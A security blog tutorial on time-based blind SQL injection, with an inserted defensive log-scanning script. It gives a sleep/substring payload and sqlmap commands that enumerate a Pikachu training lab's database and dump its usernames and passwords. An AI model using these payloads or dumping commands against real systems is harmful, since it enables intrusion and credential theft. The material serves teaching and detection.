[Network Security] SQL Injection--Time Injection

Exploitation principle

Main functions used
sleep()
substring()
if()

Example:

1' and if(substring((select * from students limit 1),1,1)='a',sleep(5),0)
# When the condition is true, sleep
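
An added example, not part of the original post: a defender-side log check for the sleep()/if()/substring() pattern above, which also records whether the response actually stalled for the requested delay. The log format, client addresses, and the names scan, LINE, DELAY, CONDITION and EXTRACT are assumptions made for this sketch; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (assumed format: client "GET target" status seconds).
SAMPLE_LOG = """\
10.0.0.5 "GET /06/vul/sqli/sqli_str.php?name=alice&submit=1" 200 0.012
10.0.0.9 "GET /06/vul/sqli/sqli_str.php?name=1%27+and+if(substring((select+*+from+students+limit+1),1,1)%3D%27a%27,sleep(5),0)&submit=1" 200 5.031
10.0.0.9 "GET /06/vul/sqli/sqli_str.php?name=1%27+and+if(substring((select+*+from+students+limit+1),1,1)%3D%27b%27,sleep(5),0)&submit=1" 200 0.015
10.0.0.7 "GET /search.php?q=how+to+sleep+better" 200 0.020
10.0.0.8 "GET /report.php?year=2023" 200 6.400
10.0.0.6 "GET /06/vul/sqli/sqli_str.php?name=sleep(5)&submit=1" 200 0.011
"""

LINE = re.compile(r'^(\S+) "GET (\S+)" (\d{3}) ([\d.]+)$')
DELAY = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)   # sleep(N)
CONDITION = re.compile(r"\bif\s*\(", re.I)                          # if(
EXTRACT = re.compile(r"\bsubstr(?:ing)?\s*\(", re.I)                # substring(

def scan(log_text):
    """Return one finding per query parameter whose decoded value calls sleep()."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        client, target, _status, elapsed = m.groups()
        # parse_qsl URL-decodes the values, so %27 and + are normalised first.
        for param, value in parse_qsl(urlsplit(target).query):
            delay = DELAY.search(value)
            if not delay:
                continue  # slow pages and the word "sleep" alone are ignored
            staged = CONDITION.search(value) and EXTRACT.search(value)
            findings.append({
                "client": client,
                "param": param,
                "kind": "conditional-extraction" if staged else "delay-probe",
                # True when the response took at least the requested delay:
                # the database evaluated the injected expression. False means
                # a false condition or input that was handled as plain data.
                "stalled": float(elapsed) >= float(delay.group(1)),
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests from one client that alternate between stalled and fast responses on the same parameter are the signature of character-by-character extraction.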

Injection using sqlmap

1. Check whether time-based injection is possible

sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql

2. Get the database name

sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql --current-user --current-db --batch

-p: Specify the parameter to test
-u: Specify the URL
-v: Set the verbosity level of the output
--dbms: Specify the back-end database type
--technique=T: Use the time-based injection technique
--current-user: Get the current user
--current-db: Get the current database
--batch: Never prompt; answer every question with the default choice

3. Get the table names

sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --tables -D pikachu --batch

-D: Specify the database name
--tables: Get all the tables

4. Get the column names

sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --columns -D pikachu -T users --batch

-T: Specify the table name
--columns: Get all the columns

5. Obtain the account names and passwords

sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T -D pikachu -T users -C 'username,password' --dump --batch --threads 10

--dump: Dump the table entries
-C: Specify the columns
--threads: Specify the number of threads

Origin blog.csdn.net/qq_41158271/article/details/129994563